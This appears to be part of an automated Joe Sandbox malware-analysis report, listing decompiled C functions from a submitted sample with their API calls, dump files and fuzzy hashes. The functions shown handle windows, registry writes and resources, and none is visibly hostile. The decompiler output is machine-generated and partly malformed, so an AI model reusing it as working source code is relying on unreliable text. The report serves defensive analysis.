
                                                                              APIs
                                                                              • GetDlgItem.USER32 ref: 00426701
                                                                              • GetTopWindow.USER32(00000000), ref: 00426714
                                                                                • Part of subcall function 004266F6: GetWindow.USER32(00000000,00000002), ref: 0042675B
                                                                              • GetTopWindow.USER32(?), ref: 00426744
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Item
                                                                              • String ID:
                                                                              • API String ID: 369458955-0
                                                                              • Opcode ID: 5631705e5c809f957598b4c13ecee59b467cdb1cffa8234aa5444bbb269fcfa3
                                                                              • Instruction ID: dc0d08a4c2c18415d0f8e2ec45dbf80cadd953b3f38c647402dafb4351fdb606
                                                                              • Opcode Fuzzy Hash: 5631705e5c809f957598b4c13ecee59b467cdb1cffa8234aa5444bbb269fcfa3
                                                                              • Instruction Fuzzy Hash: 7501D632300639B7DF223F61BE04EAF3A59AF94398F924027FC0191210DB79C91296AD
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0042B95D, Relevance: 6.0, APIs: 4, Instructions: 48registryCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E0042B95D(void* __ecx, void* __edi, void* __esi, CHAR* _a4, CHAR* _a8, char _a12) {
				intOrPtr _v8;
				char _v24;
				intOrPtr _t15;
				long _t22;
				void* _t31;
				void* _t32;

				_t15 =  *0x457184; // 0xc72e1596
				_t31 = __ecx;
				_v8 = _t15;
				if( *((intOrPtr*)(__ecx + 0x50)) == 0) {
					wsprintfA( &_v24, 0x449c40, _a12);
					_t19 = WritePrivateProfileStringA(_a4, _a8,  &_v24,  *(_t31 + 0x64));
				} else {
					_t32 = E0042DB1E(__ecx, _a4);
					if(_t32 != 0) {
						_t22 = RegSetValueExA(_t32, _a8, 0, 4,  &_a12, 4);
						RegCloseKey(_t32);
						_t19 = 0 | _t22 == 0x00000000;
					}
				}
				return E00412FBB(_t19, _v8);
			}









                                                                              0x0042b963
                                                                              0x0042b969
                                                                              0x0042b96f
                                                                              0x0042b972
                                                                              0x0042b9b6
                                                                              0x0042b9cc
                                                                              0x0042b974
                                                                              0x0042b97c
                                                                              0x0042b980
                                                                              0x0042b991
                                                                              0x0042b99a
                                                                              0x0042b9a4
                                                                              0x0042b9a7
                                                                              0x0042b980
                                                                              0x0042b9dc

                                                                              APIs
                                                                              • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004,?,?), ref: 0042B991
                                                                              • RegCloseKey.ADVAPI32(00000000,?,?), ref: 0042B99A
                                                                              • wsprintfA.USER32 ref: 0042B9B6
                                                                              • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 0042B9CC
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: ClosePrivateProfileStringValueWritewsprintf
                                                                              • String ID:
                                                                              • API String ID: 1902064621-0
                                                                              • Opcode ID: 826149d6cc030b334b62239563747890cf79af6e66d12d299ce58bfc5f0a8ac3
                                                                              • Instruction ID: c71a7eb8571e61732146ce38d87693717e96a987b498b26b918423c2770d7d29
                                                                              • Opcode Fuzzy Hash: 826149d6cc030b334b62239563747890cf79af6e66d12d299ce58bfc5f0a8ac3
                                                                              • Instruction Fuzzy Hash: 32015271600619BBCF11AF64DE05E9F7BB9FF04704F448026FA01A7150D7B4D915DB99
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0042E338, Relevance: 6.0, APIs: 4, Instructions: 45memoryCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 37%
                                                                              			E0042E338(short* _a4) {
				char* _v0;
				int _v8;
				char* _v16;
				int _t6;
				char* _t7;
				short* _t11;
				void* _t12;
				void* _t16;
				int _t17;

				_t11 = _a4;
				if(_t11 != 0) {
					__imp__#7(_t11, _t12, _t16);
					_t17 = _t6;
					_t7 = WideCharToMultiByte(0, 0, _t11, _t17, 0, 0, 0, 0);
					_v0 = _t7;
					__imp__#150(0, _t7);
					_v16 = _t7;
					WideCharToMultiByte(0, 0, _t11, _t17, _t7, _v8, 0, 0);
					return _v16;
				}
				return 0;
			}












                                                                              0x0042e33a
                                                                              0x0042e343
                                                                              0x0042e34c
                                                                              0x0042e35c
                                                                              0x0042e362
                                                                              0x0042e366
                                                                              0x0042e36a
                                                                              0x0042e376
                                                                              0x0042e37f
                                                                              0x00000000
                                                                              0x0042e386
                                                                              0x00000000

                                                                              APIs
                                                                              • SysStringLen.OLEAUT32(?), ref: 0042E34C
                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,0042F4F1,00000000), ref: 0042E362
                                                                              • SysAllocStringByteLen.OLEAUT32(00000000,00000000), ref: 0042E36A
                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,00000000,?,?,?,?,0042F4F1,00000000), ref: 0042E37F
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: Byte$CharMultiStringWide$Alloc
                                                                              • String ID:
                                                                              • API String ID: 3384502665-0
                                                                              • Opcode ID: 524a9a16848dfe829cda5aba65e293cdacdfee97946dccebf340836eb3b200f7
                                                                              • Instruction ID: 0d177c561ebc35b9d0ae186a0a59c693ea1574642207e252149dd4e1a5738ffc
                                                                              • Opcode Fuzzy Hash: 524a9a16848dfe829cda5aba65e293cdacdfee97946dccebf340836eb3b200f7
                                                                              • Instruction Fuzzy Hash: 3CF0FE721062787F93219B67AC48CABBF9CFE8B2A5B11452AF949C2110D6759801CBF5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0040D374, Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 54%
                                                                              			E0040D374(intOrPtr _a4, RECT* _a8, int _a12) {
				struct tagRECT _v20;
				intOrPtr _t28;

				_t28 = _a4;
				if(_a8 != 0) {
					IntersectRect( &_v20, _a8, _t28 - 0x9c);
					EqualRect( &_v20, _a8);
				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
				}
				if(IsRectEmpty( &_v20) == 0) {
					InvalidateRect( *( *((intOrPtr*)( *((intOrPtr*)(_t28 - 0xac)) + 0x1c)) + 0x1c),  &_v20, _a12);
				}
				return 0;
			}





                                                                              0x0040d37f
                                                                              0x0040d382
                                                                              0x0040d3a5
                                                                              0x0040d3b2
                                                                              0x0040d384
                                                                              0x0040d38f
                                                                              0x0040d390
                                                                              0x0040d391
                                                                              0x0040d392
                                                                              0x0040d394
                                                                              0x0040d3c4
                                                                              0x0040d3d9
                                                                              0x0040d3d9
                                                                              0x0040d3e3

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: Rect$EmptyEqualIntersectInvalidate
                                                                              • String ID:
                                                                              • API String ID: 3354205298-0
                                                                              • Opcode ID: b661af1b184f407ca87348843d9cadc039c6e8e96f151334bffa99b33a6900e2
                                                                              • Instruction ID: ac52aee1047fdb05690da1896c34752c5e143454f08ce81f2000444f11c0031a
                                                                              • Opcode Fuzzy Hash: b661af1b184f407ca87348843d9cadc039c6e8e96f151334bffa99b33a6900e2
                                                                              • Instruction Fuzzy Hash: 4101087290021AABCF01DFA8DD88EABB7BDFF08314F008466FE15EA151D275E5098B64
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00428065, Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E00428065(void* __ecx, CHAR* _a4) {
				void* __edi;
				struct HRSRC__* _t8;
				void* _t9;
				void* _t11;
				void* _t14;
				void* _t15;
				struct HINSTANCE__* _t16;
				void* _t17;

				_t14 = 0;
				_t11 = 0;
				_t17 = __ecx;
				if(_a4 == 0) {
					L4:
					_t15 = E004271CA(_t17, _t14, _t11);
					if(_t11 != 0 && _t14 != 0) {
						FreeResource(_t14);
					}
					return _t15;
				}
				_t16 =  *(E0042D179() + 0xc);
				_t8 = FindResourceA(_t16, _a4, 0xf0);
				if(_t8 == 0) {
					goto L4;
				}
				_t9 = LoadResource(_t16, _t8);
				_t14 = _t9;
				if(_t14 != 0) {
					_t11 = LockResource(_t14);
					goto L4;
				}
				return _t9;
			}











                                                                              0x00428069
                                                                              0x0042806b
                                                                              0x00428071
                                                                              0x00428073
                                                                              0x004280a8
                                                                              0x004280b2
                                                                              0x004280b4
                                                                              0x004280bb
                                                                              0x004280bb
                                                                              0x00000000
                                                                              0x004280c1
                                                                              0x0042807a
                                                                              0x00428087
                                                                              0x0042808f
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00428093
                                                                              0x00428099
                                                                              0x0042809d
                                                                              0x004280a6
                                                                              0x00000000
                                                                              0x004280a6
                                                                              0x004280c7

                                                                              APIs
                                                                              • FindResourceA.KERNEL32(?,?,000000F0), ref: 00428087
                                                                              • LoadResource.KERNEL32(?,00000000,?,?,?,?,004248BD,?,?,00407EBD), ref: 00428093
                                                                              • LockResource.KERNEL32(00000000,?,?,?,?,004248BD,?,?,00407EBD), ref: 004280A0
                                                                              • FreeResource.KERNEL32(00000000,?,?,?,?,004248BD,?,?,00407EBD), ref: 004280BB
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: Resource$FindFreeLoadLock
                                                                              • String ID:
                                                                              • API String ID: 1078018258-0
                                                                              • Opcode ID: ea4493c78dc4185e71a7d16939d3037bb29456f139a1174a12b4f14a5a3035e2
                                                                              • Instruction ID: 284b38b7637ae8020e4983b568648d380c2f725140e330615f9ed471a7ccb9db
                                                                              • Opcode Fuzzy Hash: ea4493c78dc4185e71a7d16939d3037bb29456f139a1174a12b4f14a5a3035e2
                                                                              • Instruction Fuzzy Hash: 8EF096363032215B93111FA67D4493FB69C9FD5752746007EFE05D3311DF658C0985AD
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0042429B, Relevance: 6.0, APIs: 4, Instructions: 41windowCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 92%
                                                                              			E0042429B(void* __ecx, void* __edi, void* __ebp, signed int _a4) {
				intOrPtr _t14;
				int _t15;
				intOrPtr _t28;
				void* _t30;

				_t30 = __ecx;
				_t14 =  *((intOrPtr*)(__ecx + 0xc));
				if(_t14 == 0) {
					if(_a4 == 0) {
						_t28 =  *((intOrPtr*)(__ecx + 0x14));
						if(GetFocus() ==  *(_t28 + 0x1c)) {
							SendMessageA( *(E00426406(__ebp, GetParent( *(_t28 + 0x1c))) + 0x1c), 0x28, 0, 0);
						}
					}
					_t15 = E0042845F( *((intOrPtr*)(_t30 + 0x14)), _a4);
					L8:
					 *((intOrPtr*)(_t30 + 0x18)) = 1;
					return _t15;
				}
				if( *((intOrPtr*)(__ecx + 0x10)) == 0) {
					asm("sbb ecx, ecx");
					_t15 = EnableMenuItem( *(_t14 + 4),  *(__ecx + 8), ( ~_a4 & 0xfffffffd) + 0x00000003 | 0x00000400);
					goto L8;
				}
				return _t14;
			}







                                                                              0x0042429c
                                                                              0x0042429e
                                                                              0x004242a3
                                                                              0x004242d3
                                                                              0x004242d6
                                                                              0x004242e2
                                                                              0x004242fc
                                                                              0x004242fc
                                                                              0x00424302
                                                                              0x0042430a
                                                                              0x0042430f
                                                                              0x0042430f
                                                                              0x00000000
                                                                              0x0042430f
                                                                              0x004242a9
                                                                              0x004242b1
                                                                              0x004242c6
                                                                              0x00000000
                                                                              0x004242c6
                                                                              0x00424317

                                                                              APIs
                                                                              • EnableMenuItem.USER32 ref: 004242C6
                                                                              • GetFocus.USER32 ref: 004242D9
                                                                              • GetParent.USER32(?), ref: 004242E7
                                                                              • SendMessageA.USER32(?,00000028,00000000,00000000), ref: 004242FC
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: EnableFocusItemMenuMessageParentSend
                                                                              • String ID:
                                                                              • API String ID: 2297321873-0
                                                                              • Opcode ID: e18b6836e4278f753236cea404f61187fcfaa90fd94312d380f75e486bdb5391
                                                                              • Instruction ID: 8bf738ed6bb06d0b298637b39d26769626752b1542a6d170bc6c9bf0e67e0af1
                                                                              • Opcode Fuzzy Hash: e18b6836e4278f753236cea404f61187fcfaa90fd94312d380f75e486bdb5391
                                                                              • Instruction Fuzzy Hash: 88017130200620EFD7289F10ED09F1ABBB5FF50711F11962EF546925F1C7B8A885CB58
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 004289D0, Relevance: 6.0, APIs: 4, Instructions: 40stringCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 82%
                                                                              			E004289D0(void* __ecx) {
				int _t26;
				int _t28;
				void* _t41;

				E004128A0(E00430F33, _t41);
				_push(__ecx);
				if( *((intOrPtr*)(__ecx + 0x4c)) != 0) {
					 *(_t41 - 0x10) =  *((intOrPtr*)( *((intOrPtr*)(E00428A50())) + 0xc))() + 0x10;
					 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
					_push(_t41 - 0x10);
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x4c)))) + 0x8c))();
					lstrcpynA( *(_t41 + 8),  *(_t41 - 0x10),  *(_t41 + 0xc));
					_t26 = lstrlenA( *(_t41 + 8));
					E00401000( &(( *(_t41 - 0x10))[0xfffffffffffffff0]), _t41 - 0x10);
					_t28 = _t26;
				} else {
					_t28 = GetWindowTextA( *(__ecx + 0x1c),  *(_t41 + 8),  *(_t41 + 0xc));
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t41 - 0xc));
				return _t28;
			}






                                                                              0x004289d5
                                                                              0x004289da
                                                                              0x004289e2
                                                                              0x00428a04
                                                                              0x00428a0c
                                                                              0x00428a13
                                                                              0x00428a14
                                                                              0x00428a23
                                                                              0x00428a2c
                                                                              0x00428a3a
                                                                              0x00428a3f
                                                                              0x004289e4
                                                                              0x004289ed
                                                                              0x004289ed
                                                                              0x00428a45
                                                                              0x00428a4d

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: H_prologTextWindowlstrcpynlstrlen
                                                                              • String ID:
                                                                              • API String ID: 3022380644-0
                                                                              • Opcode ID: 707fd6c5bc3ca48145348ffe67f6fd8f573525144c28b177efa8cdd7c8d840a9
                                                                              • Instruction ID: fe3f5d958a57acb123bb3fbcc59b2cea7e084c97e97efb327222442303b1143a
                                                                              • Opcode Fuzzy Hash: 707fd6c5bc3ca48145348ffe67f6fd8f573525144c28b177efa8cdd7c8d840a9
                                                                              • Instruction Fuzzy Hash: D7015E32510114EFCF159FA4DC08BAEBBB1FF08314F00866EF51697261CBB59950DB84
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0041E482, Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E0041E482(void* __eflags, intOrPtr* _a4, intOrPtr* _a8) {
				void* _t12;
				void* _t18;
				intOrPtr* _t20;
				void* _t21;
				void* _t22;

				_t20 = _a4;
				_t19 = _a8;
				_t12 = E0041E461( *_t20,  *_a8, _t20);
				_t22 = _t21 + 0xc;
				if(_t12 != 0) {
					_t3 = _t20 + 4; // 0x4
					_t18 = E0041E461( *_t3, 1, _t3);
					_t22 = _t22 + 0xc;
					if(_t18 != 0) {
						 *((intOrPtr*)(_t20 + 8)) =  *((intOrPtr*)(_t20 + 8)) + 1;
					}
				}
				_t6 = _t20 + 4; // 0x4
				if(E0041E461( *_t6,  *((intOrPtr*)(_t19 + 4)), _t6) != 0) {
					 *((intOrPtr*)(_t20 + 8)) =  *((intOrPtr*)(_t20 + 8)) + 1;
				}
				_t10 = _t20 + 8; // 0x8
				return E0041E461( *_t10,  *((intOrPtr*)(_t19 + 8)), _t10);
			}








                                                                              0x0041e483
                                                                              0x0041e488
                                                                              0x0041e491
                                                                              0x0041e496
                                                                              0x0041e49b
                                                                              0x0041e49d
                                                                              0x0041e4a5
                                                                              0x0041e4aa
                                                                              0x0041e4af
                                                                              0x0041e4b1
                                                                              0x0041e4b1
                                                                              0x0041e4af
                                                                              0x0041e4b4
                                                                              0x0041e4c7
                                                                              0x0041e4c9
                                                                              0x0041e4c9
                                                                              0x0041e4cc
                                                                              0x0041e4df

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: ___addl
                                                                              • String ID:
                                                                              • API String ID: 2260456530-0
                                                                              • Opcode ID: 3281c1e4b32675dd85907c3a2b35b22bf2374372d70f82225a36fe1e636480b6
                                                                              • Instruction ID: 208705f6e8477beb1adaa75ff631c02e2f22a10d2ccb4c98fb26752b20fa8347
                                                                              • Opcode Fuzzy Hash: 3281c1e4b32675dd85907c3a2b35b22bf2374372d70f82225a36fe1e636480b6
                                                                              • Instruction Fuzzy Hash: 72F06D7A400212EFDB105A43DC01EA7B7E9FF48304B04442AFD5C82232F726E8A8CF95
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0042ABB5, Relevance: 6.0, APIs: 4, Instructions: 33stringCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E0042ABB5(void* __esi, struct HWND__* _a4, CHAR* _a8) {
				intOrPtr _v8;
				char _v264;
				intOrPtr _t10;
				int _t20;

				_t10 =  *0x457184; // 0xc72e1596
				_v8 = _t10;
				_t20 = lstrlenA(_a8);
				if(_t20 > 0x100 || GetWindowTextA(_a4,  &_v264, 0x100) != _t20 || lstrcmpA( &_v264, _a8) != 0) {
					_t13 = SetWindowTextA(_a4, _a8);
				}
				return E00412FBB(_t13, _v8);
			}







                                                                              0x0042abbe
                                                                              0x0042abc7
                                                                              0x0042abd0
                                                                              0x0042abd9
                                                                              0x0042ac0a
                                                                              0x0042ac0a
                                                                              0x0042ac1a

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: TextWindow$lstrcmplstrlen
                                                                              • String ID:
                                                                              • API String ID: 330964273-0
                                                                              • Opcode ID: 8c3e5e6e83c4f47f247b0bcefc4cc00f3a05ab1aeaedd8c287c8818b5971c832
                                                                              • Instruction ID: 20c476808981e32396b1a5eba632d80cfa9b8f04381865b9799ae4853616ee20
                                                                              • Opcode Fuzzy Hash: 8c3e5e6e83c4f47f247b0bcefc4cc00f3a05ab1aeaedd8c287c8818b5971c832
                                                                              • Instruction Fuzzy Hash: ABF06D75500018BBCF21AF60EE489CEBB79EB04354F008062FD45E2220D7B8DAA0DB59
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00424D03, Relevance: 6.0, APIs: 4, Instructions: 32COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E00424D03() {
				intOrPtr _t17;
				struct HWND__* _t19;
				intOrPtr* _t28;
				void* _t30;

				_t28 =  *((intOrPtr*)(_t30 - 0x1c));
				 *(_t30 - 4) =  *(_t30 - 4) | 0xffffffff;
				if( *((intOrPtr*)(_t30 - 0x20)) != 0) {
					EnableWindow( *(_t30 - 0x14), 1);
				}
				if( *(_t30 - 0x14) != 0) {
					_t19 = GetActiveWindow();
					_t36 = _t19 -  *((intOrPtr*)(_t28 + 0x1c));
					if(_t19 ==  *((intOrPtr*)(_t28 + 0x1c))) {
						SetActiveWindow( *(_t30 - 0x14));
					}
				}
				 *((intOrPtr*)( *_t28 + 0x60))();
				E00424760(_t28, _t36);
				if( *((intOrPtr*)(_t28 + 0x54)) != 0) {
					FreeResource( *(_t30 - 0x18));
				}
				_t17 =  *((intOrPtr*)(_t28 + 0x40));
				 *[fs:0x0] =  *((intOrPtr*)(_t30 - 0xc));
				return _t17;
			}







                                                                              0x00424d03
                                                                              0x00424d08
                                                                              0x00424d0f
                                                                              0x00424d16
                                                                              0x00424d16
                                                                              0x00424d1f
                                                                              0x00424d21
                                                                              0x00424d27
                                                                              0x00424d2a
                                                                              0x00424d2f
                                                                              0x00424d2f
                                                                              0x00424d2a
                                                                              0x00424d39
                                                                              0x00424d3e
                                                                              0x00424d46
                                                                              0x00424d4b
                                                                              0x00424d4b
                                                                              0x00424d51
                                                                              0x00424d59
                                                                              0x00424d62

                                                                              APIs
                                                                              • EnableWindow.USER32(00000000,00000001), ref: 00424D16
                                                                              • GetActiveWindow.USER32 ref: 00424D21
                                                                              • SetActiveWindow.USER32(00000000,?,00000000), ref: 00424D2F
                                                                              • FreeResource.KERNEL32(00000000,?,00000000), ref: 00424D4B
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Active$EnableFreeResource
                                                                              • String ID:
                                                                              • API String ID: 3751187028-0
                                                                              • Opcode ID: dd8e1cf759cf1fba278715cd4556fbf177b53c43ed9c5f88154513c8c6efafaf
                                                                              • Instruction ID: c15fcf9ff995de270b382e2080cd508acf785bddf13373212ce2609f4b242657
                                                                              • Opcode Fuzzy Hash: dd8e1cf759cf1fba278715cd4556fbf177b53c43ed9c5f88154513c8c6efafaf
                                                                              • Instruction Fuzzy Hash: E1F0AF31A00255CFCF21DFA4EA845AEFBB1FF84311F10452AE152A22A0C7795D00CE08
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0042E734, Relevance: 6.0, APIs: 4, Instructions: 21COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 75%
                                                                              			E0042E734(intOrPtr _a4, intOrPtr _a8) {
				long _t4;
				long _t5;

				_t10 = _a4;
				if(_a4 == 0) {
					__eflags =  *0x45a388;
					if( *0x45a388 == 0) {
						_t5 = GetTickCount();
						 *0x45a388 =  *0x45a388 + 1;
						__eflags =  *0x45a388;
						 *0x457024 = _t5;
					}
					_t4 = GetTickCount() -  *0x457024;
					__eflags = _t4 - 0xea60;
					if(_t4 > 0xea60) {
						__imp__CoFreeUnusedLibraries();
						_t4 = GetTickCount();
						 *0x457024 = _t4;
					}
					return _t4;
				}
				return E0042E6DD(_t10, _a8);
			}





                                                                              0x0042e734
                                                                              0x0042e739
                                                                              0x0042e746
                                                                              0x0042e754
                                                                              0x0042e756
                                                                              0x0042e758
                                                                              0x0042e758
                                                                              0x0042e75e
                                                                              0x0042e75e
                                                                              0x0042e765
                                                                              0x0042e76b
                                                                              0x0042e770
                                                                              0x0042e772
                                                                              0x0042e778
                                                                              0x0042e77a
                                                                              0x0042e77a
                                                                              0x00000000
                                                                              0x0042e77f
                                                                              0x00000000

                                                                              APIs
                                                                              • GetTickCount.KERNEL32 ref: 0042E756
                                                                              • GetTickCount.KERNEL32 ref: 0042E763
                                                                              • CoFreeUnusedLibraries.OLE32 ref: 0042E772
                                                                              • GetTickCount.KERNEL32 ref: 0042E778
